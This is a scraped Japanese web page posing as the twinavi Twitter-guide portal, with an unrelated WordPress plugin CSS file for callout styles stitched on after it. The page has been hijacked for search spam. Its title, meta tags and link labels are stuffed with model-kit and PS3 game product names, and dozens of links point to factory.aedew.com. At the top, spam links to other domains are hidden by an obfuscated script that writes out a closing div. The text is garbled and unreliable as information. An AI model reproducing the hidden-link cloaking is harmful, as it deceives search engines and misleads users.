href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a> <a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a> <a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a> <script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script> <!DOCTYPE html> <html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </title> <meta name="description" content="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) ,PS3 俺の妹がこんなに可愛いわけがない。 ハッピーエンド(通常版)(図書カード 付)[バンダイナムコゲームス],PS3 俺の妹がこんなに可愛いわけがない。 ハッピーエンド(通常版)[バンダイナムコゲームス]" /> <meta name="keywords" content="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) " /> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <meta name="robots" content="index,follow" /> <script type="text/javascript" src="./thebey03.js"></script>p-41617.html" <meta property="og:title" content="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) " /><meta property="og:description" content="PS3 【限定麻雀風カードゲーム付き】アイドルマスター2(通常版)[バンダイナムコゲームス],フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) " /><meta property="og:type" content="website" /> <meta name="twitter:card" content="summary"> <meta name="twitter:site" content="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) "> <meta name="twitter:title" content="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) "> <meta name="twitter:description" content="PS3 【数量限定特典付き】戦国BASARA4 百花繚乱魂手箱[カプコン],フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) "> <link rel="index" href="/" /> <link rel="stylesheet" type="text/css" href="http://twinavi.jp/css/style_dante.css?1450773495" /><!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="/css/style_dante_ie.css?1450773495" /><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body id="homepage"> <header id="pageheader" class="contents xsmall"> <h1 class="light">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </h1> <ul id="header-links"> <li class="inline"><a href="" class="mark-arrow">ヘルプ</a></li> </ul> <div id="globalnav-signin" class="off"> <a href="" class="block" onClick="_gaq.push(['_trackEvent','LoginButton_PC','click','Global']);"><span class="bold">Twitter</span>でログイン</a> </div> <a href="" class="logo altimg logo-home" title="フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) ">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a> </header> <!-- global navi --> <div id="globalnav" class="wrapper"><div class="contents"> <nav><ul> <li><a href="./index.html" class="column gn-home"><span class="altimg ic-home">ホーム</span></a></li> <li><a href="" class="column">話題</a></li> <li><a href="" class="column">アカウント</a></li> <li><a href="" class="column">まとめ</a></li> <li><a href="" class="column">インタビュー</a></li> <li><a href="https://twitter.com/" class="column"><span class="altimg ic-new">NEW!!</span>ツイッター検索</a></li> <li><a href="" class="column">ツイッターガイド</a></li> </ul><div class="clearfix"></div></nav> <div id="gn-search"> <form id="globalnav-search" method="GET" action="/search2/"> <input type="text" name="keyword" value="" placeholder="アカウントや記事やツイートを検索!" class="formtext" maxlength="60"/><input type="hidden" name="ref" value="searchbox"/><input type="image" src="http://twinavi.jp/img/dante/btn_search.png" value="検索する" /> </form> </div> </div></div> <!-- //global navi --> <!-- local navi --> <!-- //local navi --> <!-- MAIN CONTENTS --> <div id="pagewrapper" class="contents"> <div class="column main"> <div class="section"> <h1 class="xsmall label orange column">HOTワード</h1> <ul class="giftext icon-l" style="margin-left:75px"> <li class="inline"><a href="" class="txt-inline">おすすめ映画</a></li> <li class="inline"><a href="" class="txt-inline">注目ニュース</a></li> <li class="inline"><a href="" class="txt-inline">ツイッター検索</a></li> <li class="inline"><a href="" class="txt-inline">オモシロ画像</a></li> </ul> </div> <section id="home-article" class="section"> <header class="section-title navi"> <h1 class="small"><a href="" style="color:#333">話題</a></h1> <div class="home-buzzcategory"> <ul> <li class="li-tab"><a id="tab-pickup" class="tab-selector-article tab s xsmall on">ピックアップ</a></li> <li class="li-tab"><a id="tab-news" class="tab-selector-article tab s xsmall">ニュース</a></li> <li class="li-tab"><a id="tab-tidbits" class="tab-selector-article tab s xsmall">オモシロ</a></li> <li class="li-tab"><a id="tab-lifestyle" class="tab-selector-article tab s xsmall">ライフスタイル</a></li> <li class="li-tab"><a id="tab-entertainment" class="tab-selector-article tab s xsmall">エンタメ</a></li> <li class="li-tab"><a id="tab-it" class="tab-selector-article tab s xsmall">IT</a></li> <li class="li-tab"><a id="tab-culture" class="tab-selector-article tab s xsmall">カルチャー</a></li> <li class="li-tab"><a id="tab-sports" class="tab-selector-article tab s xsmall">スポーツ</a></li> </ul> <div class="clearfix"></div> </div> </header> <div id="tab-pickup-content-article" class="tab-content tab-content-article on"> <div class="section-body"> <div class="column home-buzzimage"> <a href="" class="block"><img src="" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <ul class="list-article"> <li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021826680wb.html">http://factory.aedew.com/images/Chershire/02021826680wb.html</a></li> <li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021753296qg.html">http://factory.aedew.com/images/Chershire/02021753296qg.html</a></li> <li class="home-buzzlink dotted"><a href="http://factory.aedew.com/images/Chershire/02021809996gv.html">http://factory.aedew.com/images/Chershire/02021809996gv.html</a></li> <li class="home-buzzlink dotted"><a href="" class="">サウジ、イランと外交関係断絶 大使館襲撃受け</a></li> </ul> <a href="" class="xsmall">【一覧へ】</a> </div> </div> </div> </section> <!-- TWINAVI NEWS --> <section id="home-news" class="section"> <h1 class="section-title small navi"><a href="">ツイナビのおすすめ</a></h1> <div class=""> <ul> <li class="column home-news-box home-news-box0"> <span class="column icon-m"> <a href="http://twinavi.jp/topics/culture/55c5bc46-19f0-4ba7-a2c5-3812ac133a21"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/09/aekanaru-fig3.jpg" class="article-thumbnail" alt="" /></a> </span> <span class="giftext icon-m small"> <a href="">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) ,PS3 【初回生産仕様版?限定図書カード付き】輪廻のラグランジェ -鴨川デイズ- ゲーム&OVA ハイブリッド[バンダイナムコゲームス]</a> </span> </li> <li class="column home-news-box home-news-box1"> <span class="column icon-m"> <a href=""><img src="" class="article-thumbnail" alt="" /></a> </span> <span class="giftext icon-m small"> <a href="">ツイッター、ルールとポリシーを改定 プライバシー保護と、攻撃的行為の禁止をより明確に</a> </span> </li> <div class="clearfix"></div> <li class="column home-news-box home-news-box2"> <span class="column icon-m"> <a href=""><img src="" class="article-thumbnail" alt="" /></a> </span> <span class="giftext icon-m small"> <a href="http://factory.aedew.com/images/Chershire/02021840012mh.html">http://factory.aedew.com/images/Chershire/02021840012mh.html</a> </span> </li> <li class="column home-news-box home-news-box3"> <span class="column icon-m"> <a href=""><img src="" class="article-thumbnail" alt="" /></a> </span> <span class="giftext icon-m small"> <a href="">大雪・台風・災害・交通・ライフラインの情報リンク集</a> </span> </li> </ul> <div class="clearfix"></div> </div> </section> <!-- //TWINAVI NEWS --> <div class="column main-right"> <section id="home-accountranking" class="section"> <h1 class="section-title navi small"><a href="">ツイッター人気アカウント・ランキング</a></h1> <span class="caution uptime xxsmall">1/4更新</span> <div class="home-accountcategory tabwrapper s"> <ul> <li class="li-tab"><a id="tab-account1" class="tab-selector-account tab s xsmall on">総合</a></li> <li class="li-tab"><a id="tab-account2" class="tab-selector-account tab s xsmall">有名人・芸能人</a></li> <li class="li-tab"><a id="tab-account3" class="tab-selector-account tab s xsmall">おもしろ系</a></li> <li class="li-tab"><a id="tab-account4" class="tab-selector-account tab s xsmall">ミュージシャン</a></li> <li class="li-tab"><a id="tab-account5" class="tab-selector-account tab last s xsmall">お笑い</a></li> </ul> <div class="clearfix"></div> </div> <div id="tab-account1-content-account" class="tab-content tab-content-account on"> <div class="section-body"> <div class="column icon-l centered"> <a href=""> <span class="rankimage"> <span class="rank rank1">1</span> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon l" /> </span> <span class="xsmall">GACKT</span></a> </div> <div class="column icon-l centered"> <a href=""> <span class="rankimage"> <span class="rank rank2">2</span> <img src="http://pbs.twimg.com/profile_images/583313979763617792/SnAobnzc_bigger.jpg" alt="小沢一敬" class="icon l" /> </span> <span class="xsmall">小沢一敬</span></a> </div> <div class="column icon-l centered"> <a href=""> <span class="rankimage"> <span class="rank rank3">3</span> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon l" /> </span> <span class="xsmall">SHOPLIST</span></a> </div> <div class="column icon-l centered"> <a href=""> <span class="rankimage"> <span class="rank rank4">4</span> <img src="http://pbs.twimg.com/profile_images/667352898687205377/7zMXkcFD_bigger.jpg" alt="西内まりや" class="icon l" /> </span> <span class="xsmall">西内まりや</span></a> </div> <div class="column icon-l centered"> <a href=""> <span class="rankimage"> <span class="rank rank5">5</span> <img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon l" /> </span> <span class="xsmall">ショップ...</span></a> </div> <div class="clearfix"></div> </div> <div class="section-footer endline"> <a href="" class="link-more">PS3 【初回封入特典付き?限定図書カード付き】時と永遠 -トキトワ-(通常版)[バンダイナムコゲームス]</a> </div> </div> <section id="home-articleranking" class="section"> <h1 class="section-title small navi"><a href="/topics">話題アクセスランキング</a></h1> <div class="section-body"> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://api.rethumb.com/v1/width/500/http://news.tv-asahi.co.jp/articles_img/000054140_640.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">ニュース</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021905448ow.html">http://factory.aedew.com/images/Chershire/02021905448ow.html</a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021905008ui.html">http://factory.aedew.com/images/Chershire/02021905008ui.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>PS3 マブラヴ photonflowers*(フォトンフラワーズ) 限定版(クリーナークロス 付)[5pb.]</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://natalie.mu/media/comic/1502/0212/extra/news_xlarge_majicalo.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="http://twinavi.jp/topics/entertainment#topics-ranking">エンタメ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>新鋭・鈍速毎日が描く熱血魔法少女アクション...</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>PS3 仮面ライダー サモンライド![バンダイナムコゲームス],フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021720336ls.html">http://factory.aedew.com/images/Chershire/02021720336ls.html</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://pbs.twimg.com/media/CXxje1GUMAAo8pE.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">オモシロ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ピントと写真の関係性について。</a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021952124vm.html">http://factory.aedew.com/images/Chershire/02021952124vm.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>子供たちにかかわるすべての大人たちへ。さま...</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="/topics/lifestyle/560bcdc1-aa20-49c0-aa74-6230ac133a21" class="block"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/11/tweet-alt-pic.png" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">ライフスタイル</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02022110827ef.html">http://factory.aedew.com/images/Chershire/02022110827ef.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>母が不幸なのはわたしのせいではない。わたし...</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>PS3 三國志12(通常版)[コーエーテクモゲームス]</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="/img/topics/thumbnail/internetcom.gif?1450773495" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">IT</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>Google カレンダーのデータを Excel にエクス...</a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021959440vo.html">http://factory.aedew.com/images/Chershire/02021959440vo.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>家族で使いやすいLINEスタンプ登場--「洗濯し...</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://www.gizmodo.jp/images/2015/12/151225arcticwinter.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">カルチャー</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>PS3 マブラヴ オルタネイティヴ トータル?イクリプス 限定版[5pb.]</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>海の上はハードル高すぎた…SpaceX、ついに地...</a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021833632pe.html">http://factory.aedew.com/images/Chershire/02021833632pe.html</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://f.image.geki.jp/data/image/news/2560/154000/153676/news_153676_1.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">スポーツ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>徳島がDF村松の契約満了を発表</a></li> <li class="small list-s"><a href="http://factory.aedew.com/images/Chershire/02021858278pw.html">http://factory.aedew.com/images/Chershire/02021858278pw.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>「彼らは素晴らしい選手」個性磨いた神奈川県...</a></li> </ol> </div> <div class="clearfix"></div> </div> </section> <section id="home-faq" class="section"> <h1 class="section-title small navi"><a href="">Twitter使い方ガイド よくある質問アクセスランキング</a></h1> <div class="section-body"> <ol> <li class="small list-l lined"><a href="http://factory.aedew.com/images/Chershire/02021758708jg.html">http://factory.aedew.com/images/Chershire/02021758708jg.html</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>自分のツイートを削除するにはどうしたらいいですか?</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>PS3 神様と運命革命のパラドクス 初回限定版[日本一ソフトウェア]</a></li> </ol> </div> <div class="section-footer"> <a href="" class="link-more">もっと知りたい!「Twitter使い方ガイド」</a> </div> </section> </div> </div> <aside class="column sub"> <section id="twinavi-tweet" class="section"> <h1 class="section-title small">最新のツイナビツイート</h1> <div class="section-body"> <p class="small">【話題のツイート】私が「♪お手〜伝いロボ♪ 緊急出動〜♪」って歌えば、子供達は… <a rel="nofollow" target="_blank" href="">PS3 無双OROCHI 2 (図書カード 付)[コーエー]</a></p> </div> <div class="follow_sidebar follow_twitter"> <span class="altimg hukidashi"></span> <div class="column"> <a href="" title="ツイナビのTwitterアカウント" class="altimg icon m ic-twinavi">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) <</a> </div> <div class="giftext icon-m"> <a href="" title="ツイナビのTwitterアカウント" class="small">Twitterの最新情報をチェックしよう!</a> <a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">をフォロー</a> </div> <div class="clearfix"></div> </div> </section> <section id="facebook" class="section"> <p class="small">Facebook</p> <div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div> </section> <section id="home-side-account" class="section"> <h1 class="section-title small sub"><a href="">有名アカウントを探す</a></h1> <div class="section-body-sub"> <ul> <li> <a href="" class="lined all block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 総合<br /> <span class="num mute xsmall">71,071人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 有名人・芸能人<br /> <span class="num mute xsmall">2,867人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="タワーレコード川崎店(通称:タワ崎)" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> エンタメ<br /> <span class="num mute xsmall">3,226人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> <span style="letter-spacing:-2px">くらし・おでかけ</span><br /> <span class="num mute xsmall">6,128人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> メディア<br /> <span class="num mute xsmall">2,639人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="旭川市旭山動物園[公式]" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 社会・政治<br /> <span class="num mute xsmall">886人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="所英男" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> スポーツ<br /> <span class="num mute xsmall">1,080人</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> ビジネス・経済<br /> <span class="num mute xsmall">2,996人</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> サービス<br /> <span class="num mute xsmall">3,871人</span> </span> </a> </li> </ul> <div class="clearfix"></div> </div> </section> <section class="section"> <h1 class="section-title small sub"><a href="">ツイッター使い方ガイド</a></h1> <div class="section-body-sub"> <ul> <li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021922159vc.html">http://factory.aedew.com/images/Chershire/02021922159vc.html</a></li> <li class="small dotted lined"><a href="">基本的な使い方</a></li> <li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021727048dg.html">http://factory.aedew.com/images/Chershire/02021727048dg.html</a></li> <li class="small dotted lined"><a href="">FAQ よくある質問</a></li> <li class="small dotted lined last" last><a href="">用語集</a></li> </ul> </div> </section> <div class="section section-fbwidget"> <div class="section-title small sub">Facebook</div> <div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </div> </div> </aside> <div class="clearfix"></div> <nav class="contents"> <br /> <a href="" class="link-top absright">ページの上部へ</a> </nav> </div> <footer id="pagefooter" class="wrapper"> <div class="contents"> <nav> <ul id="sitemap"> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話題</a></span> <ul> <li><a href="http://factory.aedew.com/images/Chershire/02022114886od.html">http://factory.aedew.com/images/Chershire/02022114886od.html</a></li> <li><a href="">ニュース</a></li> <li><a href="">オモシロ</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02022019219xp.html">http://factory.aedew.com/images/Chershire/02022019219xp.html</a></li> <li><a href="">エンタメ</a></li> <li><a href="">IT</a></li> <li><a href="">カルチャー</a></li> <li><a href="">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a></li> <li><a href="">お知らせ</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-matome">まとめ</a></span> <ul> <li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">コミック・アニメ</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a></li> <li><a href="">映画</a></li> <li><a href="" class="div-inner small on">TV番組</a></li> <li><a href="">芸能(海外)</a></li> <li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">芸能(国内)</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">プロ野球</a></li> <li><a href="">Jリーグ</a></li> <li><a href="">スポーツ選手</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ガジェット</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021911184ge.html">http://factory.aedew.com/images/Chershire/02021911184ge.html</a></li> <li><a href="">政治</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021930187qi.html">http://factory.aedew.com/images/Chershire/02021930187qi.html</a></li> <li><a href="">IT</a></li> <li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">音楽</a></li> <li><a href="">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a></li> <li><a href="">社会</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02022059307hi.html">http://factory.aedew.com/images/Chershire/02022059307hi.html</a></li> </ul> <br class="block clearfix"><br> </li> <li class="sitemap-block"> <span class="top-sitemap"><a href="http://factory.aedew.com/images/Chershire/02021737143na.html">http://factory.aedew.com/images/Chershire/02021737143na.html</a></span> <ul> <li><a href="">インタビュー 一覧</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span> <ul> <li><a href="./index.html">総合</a></li> <li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">有名人・芸能人</a></li> <li><a href="">エンタメ</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021721152aa.html">http://factory.aedew.com/images/Chershire/02021721152aa.html</a></li> <li><a href="">メディア</a></li> <li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ビジネス・経済</a></li> <li><a href="">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a></li> <li><a href="">スポーツ</a></li> <li><a href="">サービス</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02022029808xx.html">http://factory.aedew.com/images/Chershire/02022029808xx.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-topics">特別企画</a></span> <ul> <li class="clearfix"><a href="">アンケート</a></li> <li><a href="">選挙</a></li> </ul> </li> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitter使い方ガイド</a></span> <ul> <li><a href="http://factory.aedew.com/images/Chershire/02021912805hv.html">http://factory.aedew.com/images/Chershire/02021912805hv.html</a></li> <li><a href="">Twitterとは</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021743015qp.html">http://factory.aedew.com/images/Chershire/02021743015qp.html</a></li> <li><a href="">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </a></li> <li><a href="">よくある質問</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02022004429bl.html">http://factory.aedew.com/images/Chershire/02022004429bl.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-twitter">ツイッター検索</a></span> <ul> <li><a href="">キーワード検索</a></li> <li><a href="">ユーザー会話検索</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-help">ツイナビヘルプ</a></span> <ul> <li><a href="http://factory.aedew.com/images/Chershire/02021755590pm.html">http://factory.aedew.com/images/Chershire/02021755590pm.html</a></li> <li><a href="">よくある質問</a></li> </ul> </li> </ul> </nav> <div class="clearfix"></div> </div> <div id="footer-giftext"> <div class="contents"> <!-- giftext --> <div class="column footer-giftext"> <div class="column"> <a href="http://factory.aedew.com/images/Chershire/02021900172lz.html">http://factory.aedew.com/images/Chershire/02021900172lz.html</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Twitter</span> <a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">PS3 はじめの一歩(初回封入特典:ダウンロードコード 付)(マウスパッド 付)[バンダイナムコゲームス]</a> </div> </div> <div class="column footer-giftext"> <div class="column"> <a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Facebook</span> <div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </div> </div> </div> <div class="column footer-giftext twinavismart"> <div class="column"> <a href="" class="altimg icon m ic-twinavismart">ツイナビforスマートフォン</a> </div> <div class="giftext icon-m"> <span class="subtitle"><a href="">ツイナビforスマートフォン</a></span> <span class="xsmall"><a href="">スマートフォンでアクセス!</a></span> </div> </div> <!-- //giftext --> <div class="clearfix"></div> </div> </div> <div class="contents last"> <ul id="docs" class="centered xsmall"> <li><a href="">ツイナビ ホーム</a></li> <li><a href="">利用規約</a></li> <li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">個人情報保護方針</a></li> <li><a href="">健全化に関する指針</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021837173mr.html">http://factory.aedew.com/images/Chershire/02021837173mr.html</a></li> <li><a href="http://factory.aedew.com/images/Chershire/02021718603cc.html">http://factory.aedew.com/images/Chershire/02021718603cc.html</a></li> <li><a href="">広告掲載について</a></li> <li class="last"><a href="">お問い合わせ</a> </ul> <p class="centered xsmall"><small>Copyright &copy; 2016 All rights reserved.</small></p> </div> </footer> <div class="hide"> <div id="preregister-box"> <p class="preregister-title large">フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </p> <p class="preregister-text">PS3 アサシン クリード コナーサーガ[スクウェア?エニックス]<br/>PS3 【アジア版】METRO:LAST LIGHT (ASIAN ENG VERSION)[Deep Silver],フジミ 1/144 Kawasaki P-2J 塗装済半完成品(1BOX)(Z1787) </p> <p><a href="" class="btn login preregister-login">Twitterでの認証に進む</a></p> </div> </div> </body> </html>
wp-content/plugins/mpc-massive/shortcodes/mpc_callout/css/mpc_callout.css
seyekuyinu/highlifer
/*----------------------------------------------------------------------------* CALLOUT SHORTCODE \*----------------------------------------------------------------------------*/ .mpc-callout { display: block; position: relative; -webkit-box-sizing: border-box; box-sizing: border-box; } .mpc-callout__content { overflow: hidden; } .mpc-callout__content .mpc-callout__description { padding: 0; } .mpc-callout__heading { padding: 0; } .mpc-callout__icon-wrap { display: block; } .mpc-callout__icon-wrap i { width: 1.35em; height: 1.35em; line-height: 1.35em; font-style: normal; display: block; text-align: center; } .mpc-callout__icon { display: inline-block; } /* Style 1 */ .mpc-callout--style_1 { display: table; width: 100%; } .mpc-callout--style_1 .mpc-callout__icon-wrap { display: table-cell; vertical-align: middle; width: 1px; } .mpc-callout--style_1 .mpc-callout__content { display: table-cell; vertical-align: middle; width: 100%; } 